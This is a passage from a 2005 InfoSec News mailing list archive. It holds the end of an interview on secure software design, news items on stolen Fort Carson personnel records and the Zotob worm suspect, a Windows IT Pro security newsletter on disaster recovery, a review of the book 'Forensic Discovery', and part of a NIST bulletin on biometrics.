make it harder or near impossible to make certain mistakes. Java for example has done a lot to make memory allocation bugs and many kinds of locking errors very hard to make. The second shift has been towards defense in depth. No-execute flags in processors and software emulation of them, randomization of the location of objects in memory and SELinux help control, constrain and limit the damage an attacker can do. That does help. There have been several cases now where boxes with no-execute or with restrictive SELinux rulesets are immune to exploits that worked elsewhere. SELinux also touches on the final area--the one component of the system you cannot verify, crash test, and debug: the user. Right now, systems rely on user education and reminding users "do not install free screen savers from websites" and the like. The truth is, however, that most users don't read messages from their IT staff, many don't understand them and most will be forgotten within a month. SELinux can be used to turn some of these into rigid policy, turning a virus outbreak into a helpdesk call of "the screen saver won't install." This last area is very important. We know the theory of writing secure computer programs. We are close to knowing how to create provably secure computer systems (some would argue we can--e.g. EROS). The big hurdles left are writing usable, managable, provably secure systems, and the user. It's important perhaps to point out here that secure programs, reliable programs and correct programs are all different things. Knowing how to write provably secure programs is very different from saying we know how to write reliable or correct programs. ED: Can security in software development be meaningfully incorporated into tools, so it doesn't end up stifling the productivity of developers? AC: The current evidence is yes. Many of the improvements actually increase programmer productivity by taking away tedious tasks like memory management, or identifying potential bugs at compile time and saving the programmer from chasing bugs for days, and because many of them use labeling techniques where you have to indicate when you mean to do unusual things--actually making code easier for other humans to analyze. There is no evidence that sparse has slowed kernel development, tainting features have hindered Perl, or that Java memory management harmed most productivity. The tools are doing by machinery what is hard to do by hand. Bad tools could slow people down, but good tools do not. ED: Isn't there a fundamental level at which security concerns and the freedom of individuals to innovate are opposed? Is there an end in sight to open source software created by small numbers of people? AC: There are areas where they come together--obvious ones are safety critical systems. It's just possible that you don't want nuclear power station employees innovating on site, for example. There are 'security' systems such as 'trusted computing' that can be abused by large corporations to block innovation, and unfortunately the EU ministers seem to want to help them, not their citizens. Whether the EU commission is corrupt, incompetent, or just misguided is open to debate but the results are not pretty. We've seen that with the X-Box. Microsoft sells you a product and threaten to sue you for using it to its full. Those same tools, however, are valuable to end users, providing they have control over them. The same cryptographic techology that will let Apple lock their OS to apple branded x86 computers is there for me to keep personal data secure if a future laptop is stolen. It is a tool, unfortunately a tool that can be easily abused. To a homeowner a secure house is generally good. but if you lose control of the key, it can be a positive hindrance. TCPA is no different. ED: Where is the ultimate driving force for implementing secure software going to come from? It seems that regulatory enforcement, such as in the pharmaceutical industry, might be the only way to properly protect the consumer. AC: At the moment it is coming from the cost of cleaning up. Other incentives come from statutory duties with data protection, and also from bad publicity. In the future they might also come from lawsuits--for example, if an incompetently run system harms another user--or from Government. In theory as we get better at security the expected standard rises and those who fail to keep up would become more and more exposed to negligence claims. The bad case is that someone or some organization unleashes a large scale internet PC destroyer before we are ready and legislation gets rushed through in response. That will almost certainly be bad legislation. -=- Edd Dumbill is Editor at Large for O'Reilly Network, and co-author of Mono: A Developer's Notebook. He also writes free software for GNOME, and packages Bluetooth-related software for the Debian GNU/Linux distribution. Edd has a weblog called Behind the Times. Copyright ? 2005 O'Reilly Media, Inc. From isn at c4i.org Wed Sep 14 04:30:42 2005 From: isn at c4i.org (InfoSec News) Date: Wed Sep 14 04:39:11 2005 Subject: [ISN] Fort Carson records stolen Message-ID: http://www.rockymountainnews.com/drmn/state/article/0,1299,DRMN_21_4076654,00.html By Dick Foster Rocky Mountain News September 13, 2005 COLORADO SPRINGS - Fort Carson has cautioned thousands of its soldiers to watch their credit records carefully following the theft of computerized personnel records from the post. Thieves broke into the Soldier Readiness Processing center over the weekend of Aug. 20-21 and stole four computer hard drives containing thousands of personnel records, Fort Carson spokeswoman Dee McNutt said Monday. The records include names, Social Security numbers, ages, ranks, jobs, citizenship information and unit affiliations of soldiers and civilians who had been processed through the center since January, McNutt said. Soldiers must update their personnel information through the center at least once a year, or whenever they are deploying or transferring to or from the post. Civilian federal employees and contractors deploying with military units also must register. The 3rd Armored Cavalry Regiment's 5,300 soldiers deployed to Iraq in March, and the 2nd Brigade, 2nd Infantry Division, with about 4,000 soldiers, arrived at the post in July, so most of those soldiers' records were contained on the hard drives that were stolen, McNutt said. So far, McNutt said, no credit fraud or identity theft complaints involving the stolen records have been made to authorities. Fort Carson has advised all of its soldiers, on post and deployed, how to protect themselves against possible identity theft arising from the stolen records. "We've told them to put a fraud alert on their credit reports," said McNutt. Soldiers also can place an "active duty alert" on their credit report. The alerts require businesses to verify the identity of anyone applying for credit under the name of active duty military personnel, said Holly Petraeus, senior program consultant for the Better Business Bureau Military Line. "Their best defense is to watch for anything unusual and keep an eye on their bills and credit reports," Petraeus said. Soldiers were advised to close any affected credit card or other financial account if irregularities are seen, and to file police reports and a complaint with the Federal Trade Commission, McNutt said. Fort Carson's is not the first theft of military personnel records this year. In August a suspected hacker tapped into an Air Force database containing records of 33,000 officers and enlisted personnel. The Army's Criminal Investigation Division is investigating the Fort Carson break-in, but there are no suspects, McNutt said. "This could happen in any corporation," said McNutt. "It's always good to be aware that your personal information could get out there and you should know the steps you need to protect it." From isn at c4i.org Wed Sep 14 04:29:44 2005 From: isn at c4i.org (InfoSec News) Date: Wed Sep 14 04:39:20 2005 Subject: [ISN] Computer worm suspect in court Message-ID: http://edition.cnn.com/2005/TECH/internet/09/13/morocco.worm.reut/ September 13, 2005 RABAT, Morocco (Reuters) -- A Moroccan magistrate questioned an 18-year-old science student in court on Tuesday about his alleged role in unleashing computer worms that disrupted networks across the United States last month. Farid Essebar appeared before the investigating magistrate in Rabat for three hours of questioning about the Zotob worm, his lawyer said. The worm caused computer outages at more than 100 U.S. companies, including major media outlets like CNN and The New York Times. "My client Farid Essebar was interrogated by a Rabat court investigating judge over the Zotob worm release on the Internet. He was returned back to detention in a Rabat jail," said his lawyer, Mohamed Fertat. Essebar, an experimental science student who has been in jail since his arrest on August 25, was remanded in custody and will be questioned again on September 21, Fertat added. Essebar's arrest in Morocco was part of a coordinated operation involving Turkish authorities who detained 21-year-old Attila Ekici, also suspected of involvement in the release of the Zotob worm, the FBI said in Washington. Fertat said Moroccan law allows authorities to hold a suspect in custody for two months and this can be renewed five times if necessary. "I expect the investigation to find him not guilty and that he will not be charged of any crime," he added. Court or police officials were not immediately available for comment. Despite the Zotob worm's power, it did not create such widespread havoc as previous malicious software programs like SQL Slammer and MyDoom. The FBI said close teamwork with Microsoft Corp. and authorities in Morocco and Turkey helped net Essebar and Ekici 12 days after the attack. Copyright 2005 Reuters From isn at c4i.org Thu Sep 15 00:50:14 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 15 00:57:43 2005 Subject: [ISN] Security UPDATE -- Lessons in Disaster Recovery -- September 14, 2005 Message-ID: ==================== This email newsletter comes to you free and is supported by the following advertisers, which offer products and services in which you might be interested. Please take a moment to visit these advertisers' Web sites and show your support for Security UPDATE. Supercharging SMS for Effective Asset Management http://list.windowsitpro.com/t?ctl=1387E:4FB69 ==================== 1. In Focus: Lessons in Disaster Recovery 2. Security News and Features - Recent Security Vulnerabilities - McAfee and Microsoft Warn About ASP.NET Forms Authentication - eEye's Lengthy Laundry List of Vulnerabilities 3. Security Toolkit - Security Matters Blog - FAQ - Security Forum Featured Thread 4. New and Improved - Make Your Public PCs More Resilient ==================== ==== 1. In Focus: Lessons in Disaster Recovery ==== by Mark Joseph Edwards, News Editor, mark at ntsecurity / net I seriously doubt that there is a person reading this newsletter who doesn't know of the devastation caused by Hurricane Katrina. Vast areas of the southern coast of the United States have been destroyed. People's lives are in ruins, and how long it will take to recover is still unknown. The human suffering and loss of life is heart wrenching, to put it mildly, and although I have a difficult time thinking about protecting computer systems in the wake of such disaster, such protection is in fact the focus of this newsletter. Therefore I think it's appropriate to revisit disaster recovery in terms of information security and computer networks. Katrina brings to light the fact that you and your business can be displaced not just temporarily, but for significant periods of time. A robust disaster recovery plan is paramount. Katrina shows us that in addition to thinking about system and communication failure, you should also consider the possibility that your premises might be destroyed and rendered unusable either temporarily or permanently. You need to think about system recovery, but you also need to consider hardware replacement or recovery, relocating available personnel in new office space, and replacing communication systems. Data backup strategies can include offsite storage by either physically transporting media somewhere or by using a backup system that transmits data over a communication link. Either way, you should probably use an offsite backup location that's in a completely different geographic area. You should also consider maintaining live backup Web sites, mail servers, and DNS systems that are ready to go. If you plan these right, they'll kick into action immediately as soon as anything at your main site goes down. To get in touch with key employees after a disaster, you might need conventional-phone alternatives such as cell phones and Voice over IP (VoIP) tools. However, if cell towers and other communication lines fail, then those technologies will also be useless. You could consider getting satellite phones if your business needs justify the cost. You'll also need a quick exit strategy. If you must evacuate the area, what will you take, aside from obvious essentials? You could gather disk drives that contain mission-critical data and other devices if you have time. One easy way to help protect hardware and documents you might need to take with you or leave behind is to waterproof them by using a product such as Space Bags (see URL below). Having a big safe or vault to store hardware might be a good idea too. After all, if the building collapses, Space Bags won't be much help. http://list.windowsitpro.com/t?ctl=13897:4FB69 In addition, you might consider the fact that you might have to leave a lot of data behind. If it's sensitive information, then it should be encrypted in case the hardware falls into the wrong hands in your absence. You probably won't have time to start encrypting data during a crisis, so you need to have such a process in place beforehand. Those are a few ideas that might help you review your disaster recovery plans. As I've written before, you need to be ready to take action quickly on short notice and be ready to recover quickly from events that strike with little or no advance warning. A comprehensive disaster response and recovery plan is part of good business security. You can find more information about disaster recovery for OSs, databases, email systems, and more in numerous articles on our Web site. http://list.windowsitpro.com/t?ctl=1387C:4FB69 ----- The Microsoft Professional Developers Conference 2005 (PDC05) is this week in Los Angeles. Check out Paul Thurrott's PDC05 blog on our Web site to find out the latest development news from LA. http://list.windowsitpro.com/t?ctl=13888:4FB69 ==================== ==== Sponsor: Scalable Software ==== Supercharging SMS for Effective Asset Management Cost control and license compliance have risen to the top of the IT asset and desktop management agenda. Learn to map Microsoft's SMS to specific business objectives and examine the pitfalls of relying solely on SMS to achieve business IT asset management objectives. Download this free white paper now and find out how you can leverage technology to bridge the gap between technical professionals and your CFO. http://list.windowsitpro.com/t?ctl=1387E:4FB69 ==================== ==== 2. Security News and Features ==== Recent Security Vulnerabilities If you subscribe to this newsletter, you also receive Security Alerts, which inform you about recently discovered security vulnerabilities. You can also find information about these discoveries at http://list.windowsitpro.com/t?ctl=13887:4FB69 McAfee and Microsoft Warn About ASP.NET Forms Authentication McAfee published a white paper that helps developers understand how to better protect against replay attacks in applications based on ASP.NET. Microsoft also published an article about the problem, which pertains to forms authentication. Both Microsoft and McAfee recommend a series of defenses. http://list.windowsitpro.com/t?ctl=1388F:4FB69 eEye's Lengthy Laundry List of Vulnerabilities Since the end of March, eEye Digital Security has discovered no less than nine vulnerabilities in Microsoft products, two in RealNetworks products, and one in Macromedia products. No patches are publicly available for any of these problems. http://list.windowsitpro.com/t?ctl=13890:4FB69 ==================== ==== Resources and Events ==== Windows Connections 2005 Conference--October 31 - November 3, 2005 At the Manchester Grand Hyatt in San Diego, Microsoft and Windows experts present over 40 in-depth sessions with real-world solutions you can take back and apply today. Register now to save $100 off your conference registration and attend sessions at Microsoft Exchange Connections free! http://list.windowsitpro.com/t?ctl=13895:4FB69 Identify the Key Security Considerations for Wireless Mobility Wireless and mobile technologies are enabling enterprises to gain a competitive advantage through accelerated responsiveness and increased productivity. In this free, on-demand Web seminar, you'll receive a checklist of risks to factor in when considering your wireless mobility technology evaluations and design. Sign up today and learn all you need to know about firewall security, transmission security, OTA management, management of third-party security applications, and more! http://list.windowsitpro.com/t?ctl=13884:4FB69 Get Ready for the SQL Server 2005 Roadshow in Europe Back By Popular Demand--Get the facts about migrating to SQL Server 2005! SQL Server experts will present real-world information about administration, development, and business intelligence to help you implement a best-practices migration to SQL Server 2005 and improve your database-computing environment. Receive a one-year membership to PASS and one-year subscription to SQL Server Magazine. Register now. http://list.windowsitpro.com/t?ctl=13882:4FB69 Discover SQL Server 2005 for the Enterprise. Are you prepared? In this free, half-day event you'll learn how the top new features of SQL Server 2005 will help you create and manage large-scale, mission-critical, enterprise database applications--making your job easier. Find out how to leverage SQL Server 2005's new capabilities to best support your business initiatives. Register today! http://list.windowsitpro.com/t?ctl=13885:4FB69 Cut Your Windows XP Migration Time by 60% or More! If your organization is considering--or has already begun--migrating your operating system to Windows XP, then this Web seminar is for you. Sign up for this free event and you'll learn how to efficiently migrate your applications into the Windows Installer (MSI) format and prepare them for error-free deployment and what steps you need to package your applications quickly and correctly and more! http://list.windowsitpro.com/t?ctl=13886:4FB69 Walking the Tightrope Between Recovery and Continuity There's a big difference between the ability to quickly recover lost or damaged data and the ability to keep your messaging operations running normally before, during, and after an outage. In this free Web seminar, you'll learn what the technical differences between recovery and continuity are, when each is important, and what you can do to make sure that you're hitting the right balance between them. http://list.windowsitpro.com/t?ctl=13881:4FB69 ==================== ==== Featured White Paper ==== How to Solve the Anti-Spam Dilemma In this free white paper, learn why older spam prevention technologies using traditional content filtering don't work against the latest spammer tactics--and why more corporate email administrators are turning to a managed email security service. Discover how to achieve email security with multiple-layer protection, minimize false positives, cut email administration costs, and keep user communities happy and productive. Download your copy today! http://list.windowsitpro.com/t?ctl=13880:4FB69 ==================== ==== Hot Release ==== Download Free: Patch & Spyware Management in one easy-to-use GUI. Is your network safe from Spyware? The first step to securing your network is to remove spyware, adware, and malware. Next, patch your systems to stop re-infestation. Remediate Spyware and install Patches with Shavlik NetChk Protect for a Complete Security Solution. To download free software visit: http://list.windowsitpro.com/t?ctl=13893:4FB69 ==================== ==== 3. Security Toolkit ==== Security Matters Blog: Some Vulnerabilities Are Downright Funny by Mark Joseph Edwards, http://list.windowsitpro.com/t?ctl=13892:4FB69 Full Disclosure is a decent mailing list, although the conversation can at times become childish and full of offensive language. Once in a while, a truly funny post comes across the list to lighten the discussion. Read this blog item for a little comedic relief. http://list.windowsitpro.com/t?ctl=1388D:4FB69 FAQ by John Savill, http://list.windowsitpro.com/t?ctl=13891:4FB69 Q: I'm trying to copy a user profile, but the Copy To button is grayed out in the dialog box in the System Control Panel applet. How can I access that functionality? Find the answer at http://list.windowsitpro.com/t?ctl=1388E:4FB69 Security Forum Featured Thread: Securing Microsoft Access A forum participant has a Microsoft Access database on the company network and wants some people to be able to read it and others to be able to make changes to it. When he chooses what he thinks are the proper security settings in Tools, Security, he gets a "Not a valid account name or password" error message. Does he need to save an .mdw file to a particular folder, and can he create passwords on the fly? Join the discussion at http://list.windowsitpro.com/t?ctl=1387F:4FB69 ==================== ==== Announcements ==== (from Windows IT Pro and its partners) Get All the Scripting Answers You Need If you haven't seen the Windows Scripting Solutions newsletter, you're missing out on an exclusive monthly resource that shows you how to automate time-consuming administrative tasks by using our expert- reviewed downloadable code and scripting techniques. Subscribe now and find out how you can save both time and money. Plus, get online access to our popular "Shell Scripting 101" series--click here: http://list.windowsitpro.com/t?ctl=13889:4FB69 SQL Server Magazine Has What IT Professionals Need Get SQL Server Magazine and get answers! Subscribe today and get an entire year for just $39.95--that's 44% off the cover price. You'll also gain exclusive access to the entire SQL Server Magazine article database (over 2300 articles) and get the Top SQL Tips handbook (over 60 helpful tips) FREE. This is a limited-time, risk-free offer, so click here now: http://list.windowsitpro.com/t?ctl=1388B:4FB69 ==================== ==== 4. New and Improved ==== by Renee Munshi, products@windowsitpro.com Make Your Public PCs More Resilient Jackson Backup offers the Jackson Armor Card, a PCI card that provides fast recovery technology for computers in schools, libraries, cyber cafes, and other public places. Jackson Armor Card is designed to protect a PC's OS and program settings; it guards against any form of corruption or unwanted modification, accidental or intentional damage to the hard drive, hacking, viruses, tampering, and most accidents including formatting. To recover the PC's original settings and data after an incident, you simply reboot the system. The Jackson Armor Card costs $79.99. For more information, go to http://list.windowsitpro.com/t?ctl=13896:4FB69 Tell Us About a Hot Product and Get a T-Shirt! Have you used a product that changed your IT experience by saving you time or easing your daily burden? Tell us about the product, and we'll send you a T-shirt if we write about the product in a future Windows IT Pro What's Hot column. Send your product suggestions with information about how the product has helped you to whatshot@windowsitpro.com. Editor's note: Share Your Security Discoveries and Get $100 Share your security-related discoveries, comments, or problems and solutions in the Windows IT Security print newsletter's Reader to Reader column. Email your contributions (500 words or less) to r2rwinitsec@windowsitpro.com. If we print your submission, you'll get $100. We edit submissions for style, grammar, and length. ==================== ==== Sponsored Links ==== Argent Versus MOM 2005 Download Argent Versus Microsoft Operations Manager 2005 http://list.windowsitpro.com/t?ctl=1387D:4FB69 Is Your Office Truly Fax Integrated? Download this free whitepaper from Faxback and find out! http://list.windowsitpro.com/t?ctl=13883:4FB69 ==================== ==== Contact Us ==== About the newsletter -- letters@windowsitpro.com About technical questions -- http://list.windowsitpro.com/t?ctl=13894:4FB69 About product news -- products@windowsitpro.com About your subscription -- windowsitproupdate@windowsitpro.com About sponsoring Security UPDATE -- salesopps@windowsitpro.com ==================== This email newsletter is brought to you by Windows IT Security, the leading publication for IT professionals securing the Windows enterprise from external intruders and controlling access for internal users. Subscribe today. http://list.windowsitpro.com/t?ctl=1388C:4FB69 View the Windows IT Pro privacy policy at http://www.windowsitpro.com/AboutUs/Index.cfm?action=privacy Windows IT Pro, a division of Penton Media, Inc. 221 East 29th Street, Loveland, CO 80538 Attention: Customer Service Department Copyright 2005, Penton Media, Inc. All rights reserved. From isn at c4i.org Thu Sep 15 00:50:45 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 15 00:58:09 2005 Subject: [ISN] REVIEW: "Forensic Discovery", Dan Farmer/Wietse Venema Message-ID: Forwarded from: "Rob, grandpa of Ryan, Trevor, Devon & Hannah" BKFORDIS.RVW 20050310 "Forensic Discovery", Dan Farmer/Wietse Venema, 2005, 0-201-63497-X, U$39.99/C$57.99 %A Dan Farmer zen@fish2.com %A Wietse Venema wietse@porcupine.org %C P.O. Box 520, 26 Prince Andrew Place, Don Mills, Ontario M3C 2T8 %D 2005 %G 0-201-63497-X %I Addison-Wesley Publishing Co. %O U$39.99/C$57.99 800-822-6339 Fax: (617) 944-7273 bkexpress@aw.com %O http://www.amazon.com/exec/obidos/ASIN/020163497X/robsladesinterne http://www.amazon.co.uk/exec/obidos/ASIN/020163497X/robsladesinte-21 %O http://www.amazon.ca/exec/obidos/ASIN/020163497X/robsladesin03-20 %O Audience a+ Tech 3 Writing 1 (see revfaq.htm for explanation) %P 217 p. %T "Forensic Discovery" In the preface, the authors don't promise to teach the reader anything about computer or digital forensics. Rather, they are reporting on ten years' worth of experience in looking into attacked machines. Given the authors' background, this is engrossing. But turning it into useful guidance might be left as an exercise for the reader. This is not a tutorial work for the novice, but a challenge to the experienced professional. Part one outlines the basic concepts of forensics in digital systems. Chapter one presents the "spirit of forensic discovery": look anywhere, for anything, and be prepared when you find it. (This is a tall order, particularly the "being prepared" part, but it basically corresponds to my experience.) Time information and stamps (on UNIX systems) are discussed in chapter two, along with mention of the ways that clumsy attempts to "save" systems can destroy ephemeral information. However, the level of the material sweeps between broadly generic and tightly specific: it may be difficult for those not already thoroughly familiar with forensic activities to obtain useful guidance from it. Part two is supposed to provide us with background on the abstractions of the computer and operating systems that relate to forensic recovery of materials. Chapter three addresses file system basics, but does so specifically with regard to the UNIX system. The content is much more detailed than conceptual (covering, for example, allowable characters in UNIX filenames), and command examples are not always completely explained. The usefulness of this approach is questionable, since the reader is assumed to know the UNIX system well; in which case, why cover the elementary fundamentals? However, the work does highlight aspects of operating and file system internals not encountered in normal administrative activity. Analysis of information recovered from a compromised system is reviewed in chapter four. The methods and procedures are very strictly limited by the case cited, but the examples demonstrate the backhanded thinking needed to obtain interesting data after an intrusion. A variety of intriguing ways to subvert a running system are examined in chapter five. As with previous material, the text seems to talk around the topic, while the examples, although fascinating, don't always support the general concepts under discussion. Analysis of the code of malicious software (a practice known in virus research as forensic programming) is addressed in chapter six, although the bulk of the content deals with test execution of the programming (under various forms of restriction) and both the benefit and complexity of disassembly is passed over rather lightly. Part three moves beyond the concepts and into practical difficulties. Chapter seven, although titularly about the contents of deleted files, is primarily concerned with the conservation and preservation of the access, modification, and (attribute) change times of files. (In response to the draft of this review, the authors clarified some of the poitns that they were trying to make in the text, such as the fact that material from deleted files is often more persistent than the content of active files. Unfortunately, these points, while arresting, are not always clear in the work itself.) Retrieving data from memory, particularly via the swap or paging areas of disk, is reviewed in chapter eight. The preface does state that the authors intend this book to be useful to sysadmins, incident responders, computer security professionals, and forensic analysts. I would suggest that only the last group will find much here that they can use, and then only those at the advanced edges of the field. There is certainly much that is intriguing, but the material demands of the reader that he or she have extensive background and knowledge of system and filesystem internals. Even then, extracting the information from the target system, and drawing conclusions as to the implications of that data, will be difficult. Farmer and Venema have outlined some fascinating material, on the bleeding edge of the technology, but have not made it easy for practitioners to utilize or comprehend. (In response to the draft review, The authors have noted that the full, original text of the book is now available at http://fish2.com/forensics/ or http://www.porcupine.org/forensics/.) copyright Robert M. Slade, 2005 BKFORDIS.RVW 20050310 ====================== (quote inserted randomly by Pegasus Mailer) rslade@vcn.bc.ca slade@victoria.tc.ca rslade@sun.soci.niu.edu I believe that Canada cannot, indeed that Canada must not survive by force. The country will only remain united - it should only remain united - if its citizens want to live together in one civil society. - Pierre Elliott Trudeau, Nov. 15, 1976 http://victoria.tc.ca/techrev or http://sun.soci.niu.edu/~rslade From isn at c4i.org Thu Sep 15 00:51:46 2005 From: isn at c4i.org (InfoSec News) Date: Thu Sep 15 00:58:29 2005 Subject: [ISN] ITL Bulletin for September 2005 Message-ID: Forwarded from: Elizabeth Lennon ITL BULLETIN FOR SEPTEMBER 2005 BIOMETRIC TECHNOLOGIES: HELPING TO PROTECT INFORMATION AND AUTOMATED TRANSACTIONS IN INFORMATION TECHNOLOGY SYSTEMS Shirley Radack, Editor Computer Security Division Information Technology Laboratory National Institute of Standards and Technology Technology Administration U.S. Department of Commerce Biometric technologies are crucial components of secure personal identification and verification systems, which control access to valuable information, to economic assets, and to parts of our national infrastructure. Biometric-based identification and verification systems support our information-based economy by enabling secure financial transactions and online sales, and by facilitating many law enforcement, health, and social service activities. Since September 11, 2001, our national requirements to strengthen homeland security have intensified, stimulating government and industry interest in applying biometric technologies to the automated verification of the identity of individuals. What Are Biometrics Biometric technologies are automated methods for identifying a person or verifying a person's identity based on the person's physiological or behavioral characteristics. Physiological characteristics include fingerprints, hand geometry, and facial, voice, iris, and retinal features; behavioral characteristics include the dynamics of signatures and keystrokes. Biometric technologies capture and process a person's unique characteristics, and then authenticate that person's identity based on comparison of the record of captured characteristics with a biometric sample presented by the person to be authenticated. After many years of research and development, biometric technologies have become reliable and cost-effective, and acceptable to users. New applications of biometrics are being successfully implemented in more secure travel documents, visas, and personal identity verification cards. These applications help to safeguard valuable assets and information, strengthen homeland security, and contribute to the safety and security of automated transactions. Interest in Applications of Biometric Technology Both public and private sectors are looking for reliable, accurate, and practical methods for the automated authentication of identity, and are using biometric technologies in a wide variety of applications, including health and social service programs, passport programs, driver licenses, electronic banking, investing, retail sales, and law enforcement. Authentication systems are usually characterized by three factors: * Something that you know, such as a password, * Something that you have, such as an ID badge, and/or * Something that you are, such as your fingerprints or your face. Systems that incorporate all three factors are stronger than those that use only one or two factors. Authentication using biometric factors can help to reduce identity theft and the need to remember passwords or to carry documents, which can be counterfeited. When biometric factors are used with one or two other factors, it is possible to achieve new and highly secure identity applications. For example, a biometric factor can be stored on a physical device, such as a smart card that is used to verify the identification of an individual. Today, the identification cards that are issued to employees for access to buildings and to information, and the cards that are used for financial transactions, often include biometric information. Biometric factors can also be used with encryption keys and digital signatures to enhance secure authentication. For example, biometric information could use public key infrastructure (PKI) systems that incorporate encryption (such as Federal Information Processing Standard [FIPS] 197, Advanced Encryption Standard). Encrypting the biometric information helps to make the system more tamper resistant. NIST Role in Biometrics The Information Technology Laboratory (ITL) of the National Institute of Standards and Technology (NIST) has been a major contributor to the development of measurements, standards, and tests for biometrics for many years. Areas of investigation include fingerprints, face recognition, iris recognition, and speech recognition. NIST supports the development of voluntary industry standards and the development of conformance tests, reference implementations, and evaluation procedures to facilitate the implementation of standards in biometric products. Recent legislation directed NIST to work with other federal agencies to develop standards needed for the biometric authentication of applicants for U.S. visas. In advancing the development of measurements and standards for biometrics, NIST works in close cooperation with industry, national and international standards groups, and federal, state, and local government organizations. This bulletin summarizes some of NIST's activities to support biometric standards and measurements, and updates the ITL Bulletin issued in May 2001 detailing NIST's biometric technology and standards activities: Biometrics - Technologies for Highly Secure Personal Authentication, by Fernando L. Podio. Information about NIST, industry, and standards activities, as well as listings of publications and references, is available on the Biometrics Resource Center website: http://www.nist.gov/biometrics Under the Federal Information Security Management Act of 2002 (FISMA), NIST develops standards and guidelines to protect the security and privacy of sensitive unclassified information processed in federal computers. NIST supports the development of voluntary industry standards, both nationally and internationally, as the preferred source of standards to be used by the federal government, enabling it to rely upon the private sector to supply it with goods and services (National Technology Transfer and Advancement Act of 1995 [Public Law 104-113]). NIST's Information Technology Laboratory (ITL) has been accredited as a standards developer by the American National Standards Institute (ANSI). Information about ITL's information security activities is available from the Computer Security Resource Center at: http://csrc.nist.gov/ New Requirements for Homeland Security The need for tests, measurements, reference data, and other technical tools to support the development of biometric technologies became more critical with threats to U.S. homeland security. The USA PATRIOT Act (Public Law 107-56) provides that other federal organizations work with NIST to "develop and certify a technology standard that can be used to verify the identity of persons applying for a United States visa . . ." The Enhanced Border Security Act (Public Law 107-71) spells out requirements for reviews of the effectiveness of biometric technology currently in use, and supports the development of new biometric technology for identification verification. Public Law 107-173, the Enhanced Border Security and Visa Entry Reform Act of 2002, established requirements for the development of a technology standard based on biometrics to verify the identity of persons applying for visas to the United States. Homeland Security Presidential Directive (HSPD) 12, issued in August 2004, called for the development of a mandatory, governmentwide standard for secure and reliable forms of identification for government employees and contractors. NIST Studies and Investigations NIST scientists and engineers have a great deal of experience in using computers to match images automatically. There have been long-standing efforts to assist the law enforcement community in developing and improving automated methods for fingerprint matching, in evaluating facial recognition systems, and in acquiring information systems that support the Department of Justice's Automated Fingerprint Identification System (AFIS). Much work has been done to develop test data for use in evaluating automated optical character recognition (OCR), fingerprint classification and matching, and face recognition systems. The test data help both users and implementers of recognition systems in evaluating the effectiveness of these systems. A listing of publications and test data collections related to NIST's past and ongoing investigations and studies on the automated recognition of fingerprints, faces, and handwritten characters is available at: http://www.itl.nist.gov/iaui/894.03/pubs.html#fing In response to the USA PATRIOT Act and the Enhanced Border Security Act, NIST studied biometric technologies to evaluate their potential for enhancing border security. These evaluations examined applications that would positively identify visa applicants and verify that the holder of a visa is the person to whom the visa was issued. Fingerprint performance was measured on an Immigration and Naturalization Service (INS) database of 1.2 million prints of 620,000 individuals. Face Recognition Vendor Tests (FRVT) carried out in 2002 measured face recognition performance of ten vendors on a Department of State database of 121,000 images of 37,000 individuals. Based on the evaluations, as well as practical considerations about the amount of data that can be stored on a smart card, NIST recommended that at least two fingerprints be used to positively identify visa applicants and that a dual system of face and fingerprint recognition be used to verify the identities of visa holders at points of entry into the United States. The FRVT 2002 was supported by the Defense Advanced Research Projects Agency (DARPA), the Departments of Defense, Justice and State, and other federal agencies. A Fingerprint Vendor Technology Evaluation (FpVTE) conducted in 2003 evaluated the accuracy of fingerprint matching, identification, and verification systems. This evaluation was conducted by NIST on behalf of the Justice Management Division (JMD) of the U.S. Department of Justice to assess the capability of fingerprint systems in meeting the requirements for law enforcement matching systems, visitor and immigrant status programs, and implementer software development efforts. Multiple tests were performed with combinations of fingerprint data, such as single fingers, two index fingers, four to ten fingers, and with different types and qualities of operational fingerprints, such as flat live-scan images from visa applicants, multi-finger slap live-scan images from booking or background check systems, or rolled and flat inked fingerprints from law enforcement databases. The most accurate systems were found to have consistently low error rates across a variety of data sets. System accuracy was improved when four or more fingerprint images were used. The tests also showed that the most accurate fingerprint systems are more accurate than the most accurate facial recognition systems. Results are expected to form the basis for the design and acquisition of large-scale fingerprint identification systems, such as for entry and exit systems to the United States. More information about the evaluations is available at: http://www.frvt.org Biometric technologies are essential to the implementation of Federal Information Processing Standard (FIPS) 201, Personal Identity Verification (PIV) of Federal Employees and Contractors, which was developed in accordance with the requirements of HSPD 12 and approved in February 2005 by the Secretary of Commerce. FIPS 201 specifies the technical and operational requirements for interoperable PIV systems that supply PIV cards as identification credentials and that use the cards to authenticate an individual?s identity. Draft NIST Special Publication (SP) 800-76, Biometric Data Specification for Personal Identity Verification, by Charles Wilson, Patrick Grother, and Ramaswamy Chandramouli, was developed to provide the technical specifications for the biometric data specified in FIPS 201. The publication details the technical requirements for capturing and formatting fingerprint and facial image information to be included on PIV cards. The technical requirements are based on voluntary industry standards, providing guidance for implementers when there are options in the standards that would interfere with interoperability if the options were to be implemented in different ways. Information about FIPS 201 and the PIV program at NIST is available at: http://csrc.nist.gov/piv-program/index.html Biometric Consortium The U.S. Biometric Consortium (BC), which has been meeting since 1995, includes more than 900 representatives from federal, state, and local governments, academia, and industry, who work together to coordinate and advance the development of biometric technologies. Over half of the participants in the consortium are from industry, and more than 60 federal agencies, including the executive departments and the military services, participate. The BC sponsors technology workshops, standards activities, and user activities to address research and technology evaluation efforts. The BC's annual conference, which is open to members and the general public, is now the largest biometric conference in the world. NIST and the National Security Agency (NSA) co-chair the Biometric Consortium. Information about BC activities is available on the website: http://www.itl.nist.gov/div893/biometrics/consortium.html Common Biometric Exchange Formats Framework (CBEFF) In 1999, the Biometric Consortium initiated the development of a common data format to facilitate the exchange and interoperability of biometric data. Industry and government representatives identified the need for a technology-blind biometric format that would facilitate the handling of different biometric types, versions, and biometric data structures in a common way. This common format would facilitate the exchange and interoperability of biometric data for all aspects of biometrics, independent of the particular vendor that generates the biometric data. The initial conceptual definition was achieved through a series of workshops co-sponsored by NIST and the Biometric Consortium. A technical development team led by NIST and NSA developed the Common Biometric Exchange File Format. It was published by NIST as NISTIR 6529, Common Biometrics Exchange File Format (CBEFF), in January 2001. An augmented and revised version of the CBEFF was issued as NISTIR 6529A, Common Biometric Exchange Formats Framework, in April 2004. The CBEFF describes a set of data elements necessary to support biometric technologies in a common way independently of the application and the domain of use, such as mobile devices, smart cards, protection of digital data, and biometric data storage. CBEFF facilitates biometric data interchange 